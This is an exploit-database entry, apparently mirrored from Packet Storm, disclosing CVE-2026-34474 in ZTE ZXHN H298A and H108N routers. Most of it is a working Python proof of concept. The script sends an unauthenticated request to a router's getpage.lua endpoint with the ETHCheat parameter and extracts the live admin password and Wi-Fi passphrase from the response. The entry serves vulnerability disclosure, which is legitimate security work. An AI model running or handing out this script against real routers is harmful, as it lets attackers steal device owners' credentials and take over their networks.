Share
## https://sploitus.com/exploit?id=PACKETSTORM:221647
# Title: ZTE ZXHN H298A 1.1 / H108N 2.6 - Unauthenticated Credential
    Exposure (ETHCheat Parameter)
    # Date: 2026-05-20
    # Author: Mina Nageh Salalma (Monx Research)
    # CVE: CVE-2026-34474
    # Vendor: ZTE Corporation
    # Affected: ZTE ZXHN H298A 1.1, ZXHN H108N 2.6
    # Category: Remote / Webapps
    # Tested: Lab hardware + firmware extraction
    
    # Description:
    # A GET to /getpage.lua?pid=1000&ETHCheat=1 returns the live admin password
    # (OBJ_USERINFO_IDPassword1), WLAN PSK (WLANPSK_KeyPassphrase1), and ESSID
    # in plaintext from unauthenticated requests. A second endpoint exposes
    # the device serial number. No session or credentials required.
    #
    # MITRE: https://www.cve.org/CVERecord?id=CVE-2026-34474
    # Full write-up:
    https://github.com/minanagehsalalma/cve-2026-34474-zte-h298a-h108n-sensitive-data-exposure
    
    # PoC:
    import requests
    
    def check(target):
        r = requests.get(f"http://{target}/getpage.lua?pid=1000&ETHCheat=1",
    timeout=10, verify=False)
        import re, html
        admin =
    re.search(r"id\s*=\s*'OBJ_USERINFO_IDPassword1'\s*value\s*=\s*'([^']+)'",
    r.text)
        psk =
    re.search(r"id\s*=\s*'WLANPSK_KeyPassphrase1'\s*value\s*=\s*'([^']+)'",
    r.text)
        print(f"[+] Admin: {html.unescape(admin.group(1)) if admin else '?'} |
    PSK: {html.unescape(psk.group(1)) if psk else '?'}")
    
    if __name__ == "__main__":
        import sys
        check(sys.argv[1])